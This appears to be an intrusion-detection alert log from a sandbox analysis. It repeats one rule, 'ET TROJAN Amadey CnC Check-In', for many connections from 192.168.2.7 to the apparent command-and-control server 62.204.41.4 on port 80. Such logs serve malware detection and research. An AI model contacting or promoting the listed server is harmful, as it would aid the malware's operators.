                                                                      192.168.2.762.204.41.450245802027700 02/06/23-18:38:18.033800TCP2027700ET TROJAN Amadey CnC Check-In5024580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450138802027700 02/06/23-18:37:50.675317TCP2027700ET TROJAN Amadey CnC Check-In5013880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449744802027700 02/06/23-18:36:02.475154TCP2027700ET TROJAN Amadey CnC Check-In4974480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449940802027700 02/06/23-18:36:57.476531TCP2027700ET TROJAN Amadey CnC Check-In4994080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449785802027700 02/06/23-18:36:12.181176TCP2027700ET TROJAN Amadey CnC Check-In4978580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450008802027700 02/06/23-18:37:16.510743TCP2027700ET TROJAN Amadey CnC Check-In5000880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450204802027700 02/06/23-18:38:06.733576TCP2027700ET TROJAN Amadey CnC Check-In5020480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450150802027700 02/06/23-18:37:53.545295TCP2027700ET TROJAN Amadey CnC Check-In5015080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449839802027700 02/06/23-18:36:27.025983TCP2027700ET TROJAN Amadey CnC Check-In4983980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449928802027700 02/06/23-18:36:53.692434TCP2027700ET TROJAN Amadey CnC Check-In4992880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449969802027700 02/06/23-18:37:04.479000TCP2027700ET TROJAN Amadey CnC Check-In4996980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450064802027700 02/06/23-18:37:30.054050TCP2027700ET TROJAN Amadey CnC Check-In5006480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450208802027700 02/06/23-18:38:09.067569TCP2027700ET TROJAN Amadey CnC Check-In5020880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450306802027700 02/06/23-18:38:34.417912TCP2027700ET TROJAN Amadey CnC Check-In5030680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450162802027700 02/06/23-18:37:56.405411TCP2027700ET TROJAN Amadey CnC Check-In5016280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450119802027700 02/06/23-18:37:44.576881TCP2027700ET TROJAN Amadey CnC Check-In5011980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449944802027700 02/06/23-18:36:58.418493TCP2027700ET TROJAN Amadey CnC Check-In4994480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449791802027700 02/06/23-18:36:13.602771TCP2027700ET TROJAN Amadey CnC Check-In4979180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450220802027700 02/06/23-18:38:11.948249TCP2027700ET TROJAN Amadey CnC Check-In5022080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450223802027700 02/06/23-18:38:12.656456TCP2027700ET TROJAN Amadey CnC Check-In5022380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450125802027700 02/06/23-18:37:46.016414TCP2027700ET TROJAN Amadey CnC Check-In5012580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449861802027700 02/06/23-18:36:32.032216TCP2027700ET TROJAN Amadey CnC Check-In4986180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450217802027700 02/06/23-18:38:11.221533TCP2027700ET TROJAN Amadey CnC Check-In5021780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449855802027700 02/06/23-18:36:30.616176TCP2027700ET TROJAN Amadey CnC Check-In4985580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449953802027700 02/06/23-18:37:00.586145TCP2027700ET TROJAN Amadey CnC Check-In4995380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450036802027700 02/06/23-18:37:23.421959TCP2027700ET TROJAN Amadey CnC Check-In5003680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450134802027700 02/06/23-18:37:48.466411TCP2027700ET TROJAN Amadey CnC Check-In5013480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449769802027700 02/06/23-18:36:08.538973TCP2027700ET TROJAN Amadey CnC Check-In4976980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449858802027700 02/06/23-18:36:31.320590TCP2027700ET TROJAN Amadey CnC Check-In4985880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450051802027700 02/06/23-18:37:27.043305TCP2027700ET TROJAN Amadey CnC Check-In5005180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450181802027700 02/06/23-18:38:00.930275TCP2027700ET TROJAN Amadey CnC Check-In5018180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450175802027700 02/06/23-18:37:59.517986TCP2027700ET TROJAN Amadey CnC Check-In5017580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449925802027700 02/06/23-18:36:52.126736TCP2027700ET TROJAN Amadey CnC Check-In4992580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450092802027700 02/06/23-18:37:38.122805TCP2027700ET TROJAN Amadey CnC Check-In5009280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450319802027700 02/06/23-18:38:37.557364TCP2027700ET TROJAN Amadey CnC Check-In5031980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449772802027700 02/06/23-18:36:09.270270TCP2027700ET TROJAN Amadey CnC Check-In4977280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449801802027700 02/06/23-18:36:16.822547TCP2027700ET TROJAN Amadey CnC Check-In4980180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449842802027700 02/06/23-18:36:27.765216TCP2027700ET TROJAN Amadey CnC Check-In4984280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449972802027700 02/06/23-18:37:05.232422TCP2027700ET TROJAN Amadey CnC Check-In4997280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450277802027700 02/06/23-18:38:27.380412TCP2027700ET TROJAN Amadey CnC Check-In5027780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450236802027700 02/06/23-18:38:15.815189TCP2027700ET TROJAN Amadey CnC Check-In5023680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450023802027700 02/06/23-18:37:20.267374TCP2027700ET TROJAN Amadey CnC Check-In5002380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450147802027700 02/06/23-18:37:52.828888TCP2027700ET TROJAN Amadey CnC Check-In5014780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449883802027700 02/06/23-18:36:38.704700TCP2027700ET TROJAN Amadey CnC Check-In4988380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450106802027700 02/06/23-18:37:41.418242TCP2027700ET TROJAN Amadey CnC Check-In5010680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450153802027700 02/06/23-18:37:54.264449TCP2027700ET TROJAN Amadey CnC Check-In5015380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449788802027700 02/06/23-18:36:12.897781TCP2027700ET TROJAN Amadey CnC Check-In4978880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449802802027700 02/06/23-18:36:18.022306TCP2027700ET TROJAN Amadey CnC Check-In4980280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450130802027700 02/06/23-18:37:47.251536TCP2027700ET TROJAN Amadey CnC Check-In5013080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449863802027700 02/06/23-18:36:32.512023TCP2027700ET TROJAN Amadey CnC Check-In4986380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450225802027700 02/06/23-18:38:13.126471TCP2027700ET TROJAN Amadey CnC Check-In5022580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450047802027700 02/06/23-18:37:26.104922TCP2027700ET TROJAN Amadey CnC Check-In5004780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450286802027700 02/06/23-18:38:29.567763TCP2027700ET TROJAN Amadey CnC Check-In5028680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450188802027700 02/06/23-18:38:02.626278TCP2027700ET TROJAN Amadey CnC Check-In5018880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449976802027700 02/06/23-18:37:06.213926TCP2027700ET TROJAN Amadey CnC Check-In4997680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450029802027700 02/06/23-18:37:21.731774TCP2027700ET TROJAN Amadey CnC Check-In5002980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449820802027700 02/06/23-18:36:22.420698TCP2027700ET TROJAN Amadey CnC Check-In4982080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449958802027700 02/06/23-18:37:01.789883TCP2027700ET TROJAN Amadey CnC Check-In4995880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450258802027700 02/06/23-18:38:21.134137TCP2027700ET TROJAN Amadey CnC Check-In5025880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450102802027700 02/06/23-18:37:40.471333TCP2027700ET TROJAN Amadey CnC Check-In5010280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449798802027700 02/06/23-18:36:15.438757TCP2027700ET TROJAN Amadey CnC Check-In4979880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449740802027700 02/06/23-18:36:01.508139TCP2027700ET TROJAN Amadey CnC Check-In4974080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449891802027700 02/06/23-18:36:40.650924TCP2027700ET TROJAN Amadey CnC Check-In4989180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449817802027700 02/06/23-18:36:21.693658TCP2027700ET TROJAN Amadey CnC Check-In4981780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450243802027700 02/06/23-18:38:17.517772TCP2027700ET TROJAN Amadey CnC Check-In5024380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450338802027700 02/06/23-18:38:41.974959TCP2027700ET TROJAN Amadey CnC Check-In5033880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449835802027700 02/06/23-18:36:26.067781TCP2027700ET TROJAN Amadey CnC Check-In4983580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450065802027700 02/06/23-18:37:30.338043TCP2027700ET TROJAN Amadey CnC Check-In5006580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450261802027700 02/06/23-18:38:21.845480TCP2027700ET TROJAN Amadey CnC Check-In5026180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450215802027700 02/06/23-18:38:10.750044TCP2027700ET TROJAN Amadey CnC Check-In5021580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450083802027700 02/06/23-18:37:35.944831TCP2027700ET TROJAN Amadey CnC Check-In5008380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450019802027700 02/06/23-18:37:19.314761TCP2027700ET TROJAN Amadey CnC Check-In5001980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449986802027700 02/06/23-18:37:08.750839TCP2027700ET TROJAN Amadey CnC Check-In4998680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450120802027700 02/06/23-18:37:44.810267TCP2027700ET TROJAN Amadey CnC Check-In5012080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450014802027700 02/06/23-18:37:18.030710TCP2027700ET TROJAN Amadey CnC Check-In5001480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449881802027700 02/06/23-18:36:38.196455TCP2027700ET TROJAN Amadey CnC Check-In4988180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449886802027700 02/06/23-18:36:39.465156TCP2027700ET TROJAN Amadey CnC Check-In4988680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450037802027700 02/06/23-18:37:23.652171TCP2027700ET TROJAN Amadey CnC Check-In5003780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450055802027700 02/06/23-18:37:27.766285TCP2027700ET TROJAN Amadey CnC Check-In5005580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450233802027700 02/06/23-18:38:15.078905TCP2027700ET TROJAN Amadey CnC Check-In5023380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449935802027700 02/06/23-18:36:56.304075TCP2027700ET TROJAN Amadey CnC Check-In4993580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450171802027700 02/06/23-18:37:58.553511TCP2027700ET TROJAN Amadey CnC Check-In5017180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450202802027700 02/06/23-18:38:06.231570TCP2027700ET TROJAN Amadey CnC Check-In5020280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450085802027700 02/06/23-18:37:36.424991TCP2027700ET TROJAN Amadey CnC Check-In5008580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449843802027700 02/06/23-18:36:28.008839TCP2027700ET TROJAN Amadey CnC Check-In4984380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450263802027700 02/06/23-18:38:22.311708TCP2027700ET TROJAN Amadey CnC Check-In5026380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450248802027700 02/06/23-18:38:18.734487TCP2027700ET TROJAN Amadey CnC Check-In5024880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450284802027700 02/06/23-18:38:29.098650TCP2027700ET TROJAN Amadey CnC Check-In5028480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449871802027700 02/06/23-18:36:35.146966TCP2027700ET TROJAN Amadey CnC Check-In4987180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450027802027700 02/06/23-18:37:21.251923TCP2027700ET TROJAN Amadey CnC Check-In5002780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449757802027700 02/06/23-18:36:05.614238TCP2027700ET TROJAN Amadey CnC Check-In4975780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449876802027700 02/06/23-18:36:37.001689TCP2027700ET TROJAN Amadey CnC Check-In4987680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450198802027700 02/06/23-18:38:05.080347TCP2027700ET TROJAN Amadey CnC Check-In5019880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449873802027700 02/06/23-18:36:36.003660TCP2027700ET TROJAN Amadey CnC Check-In4987380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450024802027700 02/06/23-18:37:20.506098TCP2027700ET TROJAN Amadey CnC Check-In5002480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450205802027700 02/06/23-18:38:07.442403TCP2027700ET TROJAN Amadey CnC Check-In5020580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449948802027700 02/06/23-18:36:59.384504TCP2027700ET TROJAN Amadey CnC Check-In4994880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450057802027700 02/06/23-18:37:28.262420TCP2027700ET TROJAN Amadey CnC Check-In5005780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449729802027700 02/06/23-18:35:57.348763TCP2027700ET TROJAN Amadey CnC Check-In4972980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449907802027700 02/06/23-18:36:47.522865TCP2027700ET TROJAN Amadey CnC Check-In4990780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450098802027700 02/06/23-18:37:39.529541TCP2027700ET TROJAN Amadey CnC Check-In5009880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450235802027700 02/06/23-18:38:15.569378TCP2027700ET TROJAN Amadey CnC Check-In5023580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449830802027700 02/06/23-18:36:24.829107TCP2027700ET TROJAN Amadey CnC Check-In4983080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449989802027700 02/06/23-18:37:09.476584TCP2027700ET TROJAN Amadey CnC Check-In4998980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450016802027700 02/06/23-18:37:18.532774TCP2027700ET TROJAN Amadey CnC Check-In5001680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450207802027700 02/06/23-18:38:08.630704TCP2027700ET TROJAN Amadey CnC Check-In5020780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450276802027700 02/06/23-18:38:26.300126TCP2027700ET TROJAN Amadey CnC Check-In5027680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449848802027700 02/06/23-18:36:28.944538TCP2027700ET TROJAN Amadey CnC Check-In4984880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450230802027700 02/06/23-18:38:14.375521TCP2027700ET TROJAN Amadey CnC Check-In5023080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450271802027700 02/06/23-18:38:24.266112TCP2027700ET TROJAN Amadey CnC Check-In5027180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450100802027700 02/06/23-18:37:39.998889TCP2027700ET TROJAN Amadey CnC Check-In5010080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449807802027700 02/06/23-18:36:19.287197TCP2027700ET TROJAN Amadey CnC Check-In4980780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449978802027700 02/06/23-18:37:06.699430TCP2027700ET TROJAN Amadey CnC Check-In4997880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450093802027700 02/06/23-18:37:38.357594TCP2027700ET TROJAN Amadey CnC Check-In5009380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450129802027700 02/06/23-18:37:46.992346TCP2027700ET TROJAN Amadey CnC Check-In5012980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449730802027700 02/06/23-18:35:58.016249TCP2027700ET TROJAN Amadey CnC Check-In4973080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450052802027700 02/06/23-18:37:27.283164TCP2027700ET TROJAN Amadey CnC Check-In5005280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450307802027700 02/06/23-18:38:34.659310TCP2027700ET TROJAN Amadey CnC Check-In5030780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450348802027700 02/06/23-18:38:46.302644TCP2027700ET TROJAN Amadey CnC Check-In5034880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449866802027700 02/06/23-18:36:33.225481TCP2027700ET TROJAN Amadey CnC Check-In4986680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450139802027700 02/06/23-18:37:50.922595TCP2027700ET TROJAN Amadey CnC Check-In5013980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449860802027700 02/06/23-18:36:31.786991TCP2027700ET TROJAN Amadey CnC Check-In4986080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449777802027700 02/06/23-18:36:10.512879TCP2027700ET TROJAN Amadey CnC Check-In4977780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450228802027700 02/06/23-18:38:13.886569TCP2027700ET TROJAN Amadey CnC Check-In5022880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449955802027700 02/06/23-18:37:01.055369TCP2027700ET TROJAN Amadey CnC Check-In4995580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450090802027700 02/06/23-18:37:37.652979TCP2027700ET TROJAN Amadey CnC Check-In5009080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449973802027700 02/06/23-18:37:05.465390TCP2027700ET TROJAN Amadey CnC Check-In4997380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450240802027700 02/06/23-18:38:16.797444TCP2027700ET TROJAN Amadey CnC Check-In5024080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450311802027700 02/06/23-18:38:35.648201TCP2027700ET TROJAN Amadey CnC Check-In5031180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449884802027700 02/06/23-18:36:38.947006TCP2027700ET TROJAN Amadey CnC Check-In4988480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450044802027700 02/06/23-18:37:25.381632TCP2027700ET TROJAN Amadey CnC Check-In5004480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450222802027700 02/06/23-18:38:12.425383TCP2027700ET TROJAN Amadey CnC Check-In5022280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450133802027700 02/06/23-18:37:48.134151TCP2027700ET TROJAN Amadey CnC Check-In5013380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449795802027700 02/06/23-18:36:14.536822TCP2027700ET TROJAN Amadey CnC Check-In4979580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449838802027700 02/06/23-18:36:26.789629TCP2027700ET TROJAN Amadey CnC Check-In4983880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450151802027700 02/06/23-18:37:53.780649TCP2027700ET TROJAN Amadey CnC Check-In5015180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449927802027700 02/06/23-18:36:52.819701TCP2027700ET TROJAN Amadey CnC Check-In4992780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450062802027700 02/06/23-18:37:29.485225TCP2027700ET TROJAN Amadey CnC Check-In5006280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450317802027700 02/06/23-18:38:37.080325TCP2027700ET TROJAN Amadey CnC Check-In5031780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449726802027700 02/06/23-18:35:56.260662TCP2027700ET TROJAN Amadey CnC Check-In4972680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449850802027700 02/06/23-18:36:29.439544TCP2027700ET TROJAN Amadey CnC Check-In4985080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450279802027700 02/06/23-18:38:27.884547TCP2027700ET TROJAN Amadey CnC Check-In5027980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449945802027700 02/06/23-18:36:58.654499TCP2027700ET TROJAN Amadey CnC Check-In4994580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450149802027700 02/06/23-18:37:53.313477TCP2027700ET TROJAN Amadey CnC Check-In5014980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450345802027700 02/06/23-18:38:44.689333TCP2027700ET TROJAN Amadey CnC Check-In5034580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450238802027700 02/06/23-18:38:16.299287TCP2027700ET TROJAN Amadey CnC Check-In5023880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449767802027700 02/06/23-18:36:08.035707TCP2027700ET TROJAN Amadey CnC Check-In4976780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449749802027700 02/06/23-18:36:03.660431TCP2027700ET TROJAN Amadey CnC Check-In4974980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449904802027700 02/06/23-18:36:43.781750TCP2027700ET TROJAN Amadey CnC Check-In4990480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449815802027700 02/06/23-18:36:21.210734TCP2027700ET TROJAN Amadey CnC Check-In4981580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450327802027700 02/06/23-18:38:39.273408TCP2027700ET TROJAN Amadey CnC Check-In5032780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450250802027700 02/06/23-18:38:19.214721TCP2027700ET TROJAN Amadey CnC Check-In5025080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450291802027700 02/06/23-18:38:30.738198TCP2027700ET TROJAN Amadey CnC Check-In5029180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449856802027700 02/06/23-18:36:30.850298TCP2027700ET TROJAN Amadey CnC Check-In4985680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450161802027700 02/06/23-18:37:56.171482TCP2027700ET TROJAN Amadey CnC Check-In5016180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450072802027700 02/06/23-18:37:33.278393TCP2027700ET TROJAN Amadey CnC Check-In5007280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450297802027700 02/06/23-18:38:32.224802TCP2027700ET TROJAN Amadey CnC Check-In5029780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449822802027700 02/06/23-18:36:22.933332TCP2027700ET TROJAN Amadey CnC Check-In4982280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450167802027700 02/06/23-18:37:57.576211TCP2027700ET TROJAN Amadey CnC Check-In5016780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450256802027700 02/06/23-18:38:20.656895TCP2027700ET TROJAN Amadey CnC Check-In5025680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449911802027700 02/06/23-18:36:48.462366TCP2027700ET TROJAN Amadey CnC Check-In4991180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450078802027700 02/06/23-18:37:34.718345TCP2027700ET TROJAN Amadey CnC Check-In5007880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450266802027700 02/06/23-18:38:23.033535TCP2027700ET TROJAN Amadey CnC Check-In5026680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450355802027700 02/06/23-18:38:48.066556TCP2027700ET TROJAN Amadey CnC Check-In5035580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449736802027700 02/06/23-18:36:00.525448TCP2027700ET TROJAN Amadey CnC Check-In4973680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450269802027700 02/06/23-18:38:23.765845TCP2027700ET TROJAN Amadey CnC Check-In5026980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450006802027700 02/06/23-18:37:15.979491TCP2027700ET TROJAN Amadey CnC Check-In5000680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450358802027700 02/06/23-18:38:48.804091TCP2027700ET TROJAN Amadey CnC Check-In5035880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449840802027700 02/06/23-18:36:27.290138TCP2027700ET TROJAN Amadey CnC Check-In4984080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449996802027700 02/06/23-18:37:11.560689TCP2027700ET TROJAN Amadey CnC Check-In4999680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450177802027700 02/06/23-18:37:59.985865TCP2027700ET TROJAN Amadey CnC Check-In5017780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449825802027700 02/06/23-18:36:23.646592TCP2027700ET TROJAN Amadey CnC Check-In4982580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449751802027700 02/06/23-18:36:04.175861TCP2027700ET TROJAN Amadey CnC Check-In4975180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450110802027700 02/06/23-18:37:42.371968TCP2027700ET TROJAN Amadey CnC Check-In5011080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449917802027700 02/06/23-18:36:49.905140TCP2027700ET TROJAN Amadey CnC Check-In4991780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449739802027700 02/06/23-18:36:01.266268TCP2027700ET TROJAN Amadey CnC Check-In4973980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449999802027700 02/06/23-18:37:14.145161TCP2027700ET TROJAN Amadey CnC Check-In4999980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449828802027700 02/06/23-18:36:24.349767TCP2027700ET TROJAN Amadey CnC Check-In4982880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450281802027700 02/06/23-18:38:28.378215TCP2027700ET TROJAN Amadey CnC Check-In5028180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450192802027700 02/06/23-18:38:03.610612TCP2027700ET TROJAN Amadey CnC Check-In5019280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450088802027700 02/06/23-18:37:37.171595TCP2027700ET TROJAN Amadey CnC Check-In5008880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449968802027700 02/06/23-18:37:04.244029TCP2027700ET TROJAN Amadey CnC Check-In4996880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450021802027700 02/06/23-18:37:19.783407TCP2027700ET TROJAN Amadey CnC Check-In5002180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449901802027700 02/06/23-18:36:43.063640TCP2027700ET TROJAN Amadey CnC Check-In4990180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449761802027700 02/06/23-18:36:06.571220TCP2027700ET TROJAN Amadey CnC Check-In4976180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450009802027700 02/06/23-18:37:16.756199TCP2027700ET TROJAN Amadey CnC Check-In5000980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450342802027700 02/06/23-18:38:43.108288TCP2027700ET TROJAN Amadey CnC Check-In5034280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450212802027700 02/06/23-18:38:10.033408TCP2027700ET TROJAN Amadey CnC Check-In5021280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449983802027700 02/06/23-18:37:08.027985TCP2027700ET TROJAN Amadey CnC Check-In4998380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449942802027700 02/06/23-18:36:57.946569TCP2027700ET TROJAN Amadey CnC Check-In4994280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450123802027700 02/06/23-18:37:45.530650TCP2027700ET TROJAN Amadey CnC Check-In5012380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449853802027700 02/06/23-18:36:30.146489TCP2027700ET TROJAN Amadey CnC Check-In4985380192.168.2.762.204.41.4
